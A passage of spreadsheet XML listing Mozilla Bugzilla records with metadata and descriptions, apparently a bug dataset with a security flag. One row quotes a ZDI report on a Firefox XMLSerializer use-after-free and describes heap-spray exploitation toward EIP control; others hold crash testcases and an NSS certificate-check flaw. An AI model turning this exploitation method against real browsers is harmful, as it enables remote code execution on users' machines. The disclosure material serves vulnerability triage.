      <c r="Q40" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R40" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S40" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T40" t="n">
        <v>1</v>
      </c>
      <c r="U40" t="n">
        <v>0</v>
      </c>
      <c r="V40" t="n">
        <v>18</v>
      </c>
      <c r="W40" t="inlineStr">
        <is>
          <t>for (var i = 0; i &lt; 3; ++i) {
  (function() { return this; })();
}
Causes a null deref within JITted code.</t>
        </is>
      </c>
      <c r="X40" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" t="n">
        <v>919700</v>
      </c>
      <c r="B41" t="inlineStr">
        <is>
          <t>2013-09-23 13:01:01 -0700</t>
        </is>
      </c>
      <c r="C41" t="inlineStr">
        <is>
          <t>Reconfigure socorro-es[1-2].dev.webapp.phx1 to be part of the production cluster</t>
        </is>
      </c>
      <c r="D41" t="inlineStr">
        <is>
          <t>2016-07-25 14:18:01 -0700</t>
        </is>
      </c>
      <c r="E41" t="n">
        <v>1</v>
      </c>
      <c r="F41" t="n">
        <v>1</v>
      </c>
      <c r="G41" t="n">
        <v>6</v>
      </c>
      <c r="H41" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I41" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J41" t="inlineStr">
        <is>
          <t>WebOps: Socorro</t>
        </is>
      </c>
      <c r="K41" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L41" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M41" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N41" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O41" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P41" t="inlineStr"/>
      <c r="Q41" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R41" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S41" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T41" t="n">
        <v>1</v>
      </c>
      <c r="U41" t="n">
        <v>0</v>
      </c>
      <c r="V41" t="n">
        <v>3</v>
      </c>
      <c r="W41" t="inlineStr">
        <is>
          <t>As we're reached 98% capacity on the production ES cluster and the new servers are still under financial review, we're going to repurpose the dev ES servers as part of the production cluster to add more capacity.
This bug will track that work</t>
        </is>
      </c>
      <c r="X41" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" t="n">
        <v>1456085</v>
      </c>
      <c r="B42" t="inlineStr">
        <is>
          <t>2018-04-23 04:17:45 -0700</t>
        </is>
      </c>
      <c r="C42" t="inlineStr">
        <is>
          <t>Increase ESLint's minimum node &amp; npm requirements to 8.9.1 &amp; 5.5.1 respectively</t>
        </is>
      </c>
      <c r="D42" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E42" t="n">
        <v>1</v>
      </c>
      <c r="F42" t="n">
        <v>1</v>
      </c>
      <c r="G42" t="n">
        <v>7</v>
      </c>
      <c r="H42" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I42" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J42" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K42" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L42" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M42" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N42" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O42" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P42" t="inlineStr"/>
      <c r="Q42" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R42" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S42" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T42" t="n">
        <v>1</v>
      </c>
      <c r="U42" t="n">
        <v>0</v>
      </c>
      <c r="V42" t="n">
        <v>6</v>
      </c>
      <c r="W42" t="inlineStr">
        <is>
          <t>Per bug 1456078, the minimum node version is being increased to v6.14.0 for the next major ESLint update. Currently we require v6.9.1.
I think we should bump the node version, and also go up to a minimum of 8.9.1:
* MozillaBuild &amp; our automation already use node 8.9.1
* A lot has changed in npm between 3.10.x and 5.5.x, upgrading the minimum will provide better consistency for developers, especially with respect to npm-shrinkwrap.json
* node 8.9.1 ships with npm 5.5.1
* This brings us closer to what was suggested in the "Intent to require Node..." thread on dev-platform a while ago.</t>
        </is>
      </c>
      <c r="X42" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" t="n">
        <v>800263</v>
      </c>
      <c r="B43" t="inlineStr">
        <is>
          <t>2012-10-11 00:01:31 -0700</t>
        </is>
      </c>
      <c r="C43" t="inlineStr">
        <is>
          <t>[FM Radio] Launch the FM Radio with headphone already plugged-in will cause screen freeze</t>
        </is>
      </c>
      <c r="D43" t="inlineStr">
        <is>
          <t>2012-11-08 19:05:23 -0800</t>
        </is>
      </c>
      <c r="E43" t="n">
        <v>1</v>
      </c>
      <c r="F43" t="n">
        <v>1</v>
      </c>
      <c r="G43" t="n">
        <v>6</v>
      </c>
      <c r="H43" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I43" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J43" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K43" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L43" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M43" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N43" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O43" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P43" t="inlineStr">
        <is>
          <t>[caf:blocking]</t>
        </is>
      </c>
      <c r="Q43" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R43" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S43" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T43" t="n">
        <v>1</v>
      </c>
      <c r="U43" t="n">
        <v>0</v>
      </c>
      <c r="V43" t="n">
        <v>43</v>
      </c>
      <c r="W43" t="inlineStr">
        <is>
          <t>## Environment :
Otoro phone, build 2012-10-11
Build info: 
* "gaia" revision= beee2bf29e779b12306b16c2bc2785c1c22ede45
* "gecko" revision= c0ea0728044b2a5f9556ca988635140963cff037
## Repro :
1. Plug in the headphone
2. Launch the FM Radio app
3. Try to press the buttons
## Expected:
* The app works fine
## Actual:
* The screen will freeze and can't do anything (even press the sleep button) but put off the battery
## Note:
* It works fine if launch the app first, then plug in the headphone</t>
        </is>
      </c>
      <c r="X43" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" t="n">
        <v>814001</v>
      </c>
      <c r="B44" t="inlineStr">
        <is>
          <t>2012-11-21 08:01:48 -0800</t>
        </is>
      </c>
      <c r="C44" t="inlineStr">
        <is>
          <t>[FIX] XMLSerializer Use-After-Free Remote Code Execution Vulnerability (ZDI-CAN-1608)</t>
        </is>
      </c>
      <c r="D44" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E44" t="n">
        <v>1</v>
      </c>
      <c r="F44" t="n">
        <v>1</v>
      </c>
      <c r="G44" t="n">
        <v>3</v>
      </c>
      <c r="H44" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I44" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J44" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K44" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L44" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M44" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N44" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O44" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P44" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+][qa?]</t>
        </is>
      </c>
      <c r="Q44" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R44" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S44" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T44" t="n">
        <v>1</v>
      </c>
      <c r="U44" t="n">
        <v>0</v>
      </c>
      <c r="V44" t="n">
        <v>30</v>
      </c>
      <c r="W44" t="inlineStr">
        <is>
          <t>::gpgmail-start-pgp-part::ZDI-CAN-1608: Mozilla Firefox XMLSerializer Use-After-Free Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Version(s) Tested: Mozilla Firefox 13.0.1
Platform(s) Tested: Windows XP SP3
--------------------- 
Vulnerability details 
---------------------
From the researcher:
From content/base/src/nsDOMSerializer.cpp:
nsDocumentEncoder::SerializeToStringRecursive(nsINode* aNode,
nsAString&amp; aStr,
bool aDontSerializeRoot) {
...
if (!aDontSerializeRoot) {
rv = SerializeNodeStart(maybeFixedNode, 0, -1, aStr, aNode);
NS_ENSURE_SUCCESS(rv, rv);
}
...
}
nsDocumentEncoder::SerializeNodeStart(nsINode* aNode,
PRInt32 aStartOffset,
PRInt32 aEndOffset,
nsAString&amp; aStr,
nsINode* aOriginalNode) {
...
if (node-&gt;IsElement()) {
...
Element* originalElement =
aOriginalNode &amp;&amp; aOriginalNode-&gt;IsElement() ?
aOriginalNode-&gt;AsElement() : nsnull;
mSerializer-&gt;AppendElementStart(node-&gt;AsElement(),
originalElement, aStr);
return NS_OK;
}
...
}
From content/base/src/nsXMLContentSerializer.cpp:
nsXMLContentSerializer::AppendElementStart(Element* aElement,
Element* aOriginalElement,
nsAString&amp; aStr) {
...
if (!CheckElementStart(content, forceFormat, aStr)) {
return NS_OK;
}
...
}
From content/base/src/nsXHTMLContentSerializer.cpp:
nsXHTMLContentSerializer::CheckElementStart(nsIContent * aContent,
bool &amp; aForceFormat,
nsAString&amp; aStr) {
...
aForceFormat = aContent-&gt;HasAttr(kNameSpaceID_None,
nsGkAtoms::mozdirty);
...
}
After reaching the use-after-free condition, we need to take over memory
previously occupied by a deleted node. Thus, we force allocation of some
strings that will make |child-&gt;GetNextSibling()| return memory address within
predictable range of a heap spray. If data stored on a heap spray fulfils basic
constraints (0x8 at offset of |mBoolFlags| for the sake of |node-&gt;IsElement()|
being true), we are free to specify "custom" pointer to virtual function table.
This way we can arbitrarily change program execution flow at |aContent-&gt;HasAttr()|.
The code below triggers the vulnerability: 
--------------- 
Begin Code Snip 
---------------
&lt;!doctype html&gt;
&lt;!--
     Mozilla Firefox 13.0.1
     XMLSerializer use-after-free
     Windows XP SP3 x86 EIP control
     regenrecht@o2.pl Jul 2012
--&gt;
&lt;html&gt;
&lt;body onload="run();"&gt;
&lt;/body&gt;
&lt;/html&gt;
--------------- 
End Code Snip 
---------------
This will create an XMLSerializer and an associated write function that will remove a node and spray the heap such that EIP will end up being c1c2c3c4
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 180 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 180 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@tippingpoint.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Please contact us for further information or refer to:
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/::gpgmail-end-pgp-part::</t>
        </is>
      </c>
      <c r="X44" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" t="n">
        <v>910438</v>
      </c>
      <c r="B45" t="inlineStr">
        <is>
          <t>2013-08-28 13:55:55 -0700</t>
        </is>
      </c>
      <c r="C45" t="inlineStr">
        <is>
          <t>CERT_VerifyCert returns SECSuccess (saying certificate is good) even for bad certificates, when the CERTVerifyLog log parameter is given</t>
        </is>
      </c>
      <c r="D45" t="inlineStr">
        <is>
          <t>2013-11-08 16:05:40 -0800</t>
        </is>
      </c>
      <c r="E45" t="n">
        <v>1</v>
      </c>
      <c r="F45" t="n">
        <v>1</v>
      </c>
      <c r="G45" t="n">
        <v>3</v>
      </c>
      <c r="H45" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I45" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J45" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K45" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L45" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M45" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N45" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O45" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P45" t="inlineStr">
        <is>
          <t>Doesn't affect Firefox, but maybe other NSS-using products</t>
        </is>
      </c>
      <c r="Q45" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R45" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S45" t="inlineStr">
        <is>
          <t>3.15.3</t>
        </is>
      </c>
      <c r="T45" t="n">
        <v>1</v>
      </c>
      <c r="U45" t="n">
        <v>0</v>
      </c>
      <c r="V45" t="n">
        <v>16</v>
      </c>
      <c r="W45" t="inlineStr">
        <is>
          <t>Calling Cert_VerifyCert on a trusted certificate with incompatible keyusages for the usage returns success if the verifylog parameter is not null and failure if the verifylog parameter is not null.
I would prefer to fail always on bad key usages. The issue is on:
http://mxr.mozilla.org/mozilla-central/source/security/nss/lib/certhigh/certvfy.c#1314
notice that if the certificate is trusted it will always exit... but
on a bad key usage with no log, the function would have terminated earlier with fail on:
http://mxr.mozilla.org/mozilla-central/source/security/nss/lib/certhigh/certvfy.c#1303</t>
        </is>
      </c>
      <c r="X45" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" t="n">
        <v>486398</v>
      </c>
      <c r="B46" t="inlineStr">
        <is>
          <t>2009-04-01 14:00:10 -0700</t>
        </is>
      </c>
      <c r="C46" t="inlineStr">
        <is>
          <t>Crash [@ nsHTMLIFrameElement::QueryInterface]</t>
        </is>
      </c>
      <c r="D46" t="inlineStr">
        <is>
          <t>2013-08-25 18:08:16 -0700</t>
        </is>
      </c>
      <c r="E46" t="n">
        <v>1</v>
      </c>
      <c r="F46" t="n">
        <v>1</v>
      </c>
      <c r="G46" t="n">
        <v>3</v>
      </c>
      <c r="H46" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I46" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J46" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K46" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L46" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M46" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N46" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O46" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P46" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q46" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R46" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S46" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T46" t="n">
        <v>1</v>
      </c>
      <c r="U46" t="n">
        <v>0</v>
      </c>
      <c r="V46" t="n">
        <v>24</v>
      </c>
      <c r="W46" t="inlineStr">
        <is>
          <t>Created attachment 370500
zipped up unminimized testcase
I have an unminimized testcase that crashes with this stacktrace. Unfortunately, it does crash not regurlarly, it can take up to 5 minutes to crash, which makes it really difficult to make a minimized testcase, so I'm giving up for now.
I've attached an zipped up unminimized testcase. Open the 'parentframe.htm' file to test. You might be more lucky to get the crash to open that file in multiple tabs.
It also crashes Firefox 3, so marking security sensitive for now.
http://crash-stats.mozilla.com/report/index/7e8f4374-c8c1-4184-9cdf-618842090401?p=1
0  	ntdll.dll  	KiFastSystemCallRet  	
1 	ntdll.dll 	NtReleaseSemaphore 	
2 	kernel32.dll 	ReleaseSemaphore 	
3 	xul.dll 	google_breakpad::ExceptionHandler::WriteMinidumpOnHandlerThread 	toolkit/crashreporter/google-breakpad/src/client/windows/handler/exception_handler.cc:562
4 	xul.dll 	xul.dll@0x9254f7 	
5 	mozcrt19.dll 	_purecall 	obj-firefox/memory/jemalloc/src/purevirt.c:47
6 	xul.dll 	nsGenericElement::QueryInterface 	content/base/src/nsGenericElement.cpp:4122
7 	xul.dll 	xul.dll@0x9254f7 	
8 	xul.dll 	nsHTMLIFrameElement::QueryInterface 	content/html/content/src/nsHTMLIFrameElement.cpp:120
9 	xul.dll 	nsCOMPtr_base::assign_from_qi 	obj-firefox/xpcom/build/nsCOMPtr.cpp:96
10 	xul.dll 	nsCOMPtr&lt;nsIContent&gt;::nsCOMPtr&lt;nsIContent&gt; 	obj-firefox/dist/include/xpcom/nsCOMPtr.h:572
11 	xul.dll 	nsGlobalWindow::PostHandleEvent 	dom/base/nsGlobalWindow.cpp:2350
12 	xul.dll 	nsEventTargetChainItem::HandleEventTargetChain 	content/events/src/nsEventDispatcher.cpp:294
13 	xul.dll 	nsEventTargetChainItem::HandleEventTargetChain 	content/events/src/nsEventDispatcher.cpp:345
14 	xul.dll 	nsEventDispatcher::Dispatch 	content/events/src/nsEventDispatcher.cpp:508
15 	xul.dll 	DocumentViewerImpl::LoadComplete 	layout/base/nsDocumentViewer.cpp:1001
16 	xul.dll 	nsDocShell::EndPageLoad 	docshell/base/nsDocShell.cpp:5263
17 	xul.dll 	nsWebShell::EndPageLoad 	docshell/base/nsWebShell.cpp:1302
18 	xul.dll 	nsCOMPtr_base::assign_from_qi 	obj-firefox/xpcom/build/nsCOMPtr.cpp:98
19 	xul.dll 	nsDocShell::OnStateChange 	docshell/base/nsDocShell.cpp:5159
Firefox 3.0.7 breakpad id:
http://crash-stats.mozilla.com/report/index/1af246df-488c-4ea9-a806-8ad022090401?p=1</t>
        </is>
      </c>
      <c r="X46" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" t="n">
        <v>55261</v>
      </c>
      <c r="B47" t="inlineStr">
        <is>
          <t>2000-10-04 18:32:52 -0700</t>
        </is>
      </c>
      <c r="C47" t="inlineStr">
        <is>
          <t>GTK modal dialog locks up browser when installing plugin</t>
        </is>
      </c>
      <c r="D47" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E47" t="n">
        <v>1</v>
      </c>
      <c r="F47" t="n">
        <v>1</v>
      </c>
      <c r="G47" t="n">
        <v>6</v>
      </c>
      <c r="H47" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I47" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J47" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K47" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L47" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M47" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N47" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O47" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P47" t="inlineStr">
        <is>
          <t>[rtm-] relnote-user</t>
        </is>
      </c>
      <c r="Q47" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R47" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S47" t="inlineStr">
        <is>
          <t>mozilla0.8</t>
        </is>
      </c>
      <c r="T47" t="n">
        <v>1</v>
      </c>
      <c r="U47" t="n">
        <v>0</v>
      </c>
      <c r="V47" t="n">
        <v>59</v>
      </c>
      <c r="W47" t="inlineStr">
        <is>
          <t>With a new mozilla installation i visited a page containing java.
The 'go here to install this plugin' dialog popped up prompting
me to install the jvm. I clicked, and the jvm download page
poppped up but I couldn't do anything with it because the
stupid modal dialog was still hanging around on my screen buried
under other windows. I figured mozilla had locked up yet again and
was about to kill it.
Dismissing the dialog fixed everything.</t>
        </is>
      </c>
      <c r="X47" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" t="n">
        <v>600667</v>
      </c>
      <c r="B48" t="inlineStr">
        <is>
          <t>2010-09-29 13:23:00 -0700</t>
        </is>
      </c>
      <c r="C48" t="inlineStr">
        <is>
          <t>Input staging is returning a 500 Internal Server Error / down</t>
        </is>
      </c>
      <c r="D48" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E48" t="n">
        <v>1</v>
      </c>
      <c r="F48" t="n">
        <v>1</v>
      </c>
      <c r="G48" t="n">
        <v>6</v>
      </c>
      <c r="H48" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I48" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J48" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K48" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L48" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M48" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N48" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O48" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P48" t="inlineStr"/>
      <c r="Q48" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R48" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S48" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T48" t="n">
        <v>1</v>
      </c>
      <c r="U48" t="n">
        <v>0</v>
      </c>
      <c r="V48" t="n">
        <v>11</v>
      </c>
      <c r="W48" t="inlineStr">
        <is>
          <t>Though bug 600444 is fixed, http://input.stage.mozilla.com/ and http://m.input.stage.mozilla.com/ are still down, but now returning a 500 Internal Server Error
Sorry, not sure if this is an app or IT bug.</t>
        </is>
      </c>
      <c r="X48" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" t="n">
        <v>1290012</v>
      </c>
      <c r="B49" t="inlineStr">
        <is>
          <t>2016-07-28 01:14:16 -0700</t>
        </is>
      </c>
      <c r="C49" t="inlineStr">
        <is>
          <t>Introduce setting to enable experimental activity stream feature</t>
        </is>
      </c>
      <c r="D49" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E49" t="n">
        <v>1</v>
      </c>
      <c r="F49" t="n">
        <v>1</v>
      </c>
      <c r="G49" t="n">
        <v>6</v>
      </c>
      <c r="H49" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I49" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J49" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K49" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L49" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M49" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N49" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O49" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P49" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q49" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R49" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S49" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T49" t="n">
        <v>1</v>
      </c>
      <c r="U49" t="n">
        <v>0</v>
      </c>
      <c r="V49" t="n">
        <v>7</v>
      </c>
      <c r="W49" t="inlineStr">
        <is>
          <t>As soon as we have a first, showable version of Activity Stream on Android, we want to enable it for at least Nightly so that some folks can start using/testing it while we iterate. We do not want to just enable this for all users so let's start with a setting that will show up if the build flag is enabled</t>
        </is>
      </c>
      <c r="X49" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" t="n">
        <v>1275005</v>
      </c>
      <c r="B50" t="inlineStr">
        <is>
          <t>2016-05-23 07:56:20 -0700</t>
        </is>
      </c>
      <c r="C50" t="inlineStr">
        <is>
          <t>Create a prototype for the bug triage dashboard based on re:dash</t>
        </is>
      </c>
      <c r="D50" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E50" t="n">
        <v>1</v>
      </c>
      <c r="F50" t="n">
        <v>1</v>
      </c>
      <c r="G50" t="n">
        <v>6</v>
      </c>
      <c r="H50" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I50" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J50" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K50" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L50" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M50" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N50" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O50" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P50" t="inlineStr"/>
      <c r="Q50" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R50" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S50" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T50" t="n">
        <v>1</v>
      </c>
      <c r="U50" t="n">
        <v>0</v>
      </c>
      <c r="V50" t="n">
        <v>5</v>
      </c>
      <c r="W50" t="inlineStr">
        <is>
          <t>Let's start to explore/validate the available data using a prototype based on re:dash</t>
        </is>
      </c>
      <c r="X50" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" t="n">
        <v>717488</v>
      </c>
      <c r="B51" t="inlineStr">
        <is>
          <t>2012-01-11 18:14:20 -0800</t>
        </is>
      </c>
      <c r="C51" t="inlineStr">
        <is>
          <t>"ASSERTION: Uh, mDocument doesn't match the current inner window document!" with nearNativeStackLimit, sync XHR</t>
        </is>
      </c>
      <c r="D51" t="inlineStr">
        <is>
          <t>2012-07-20 18:27:27 -0700</t>
        </is>
      </c>
      <c r="E51" t="n">
        <v>1</v>
      </c>
      <c r="F51" t="n">
        <v>1</v>
      </c>
      <c r="G51" t="n">
        <v>3</v>
      </c>
      <c r="H51" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
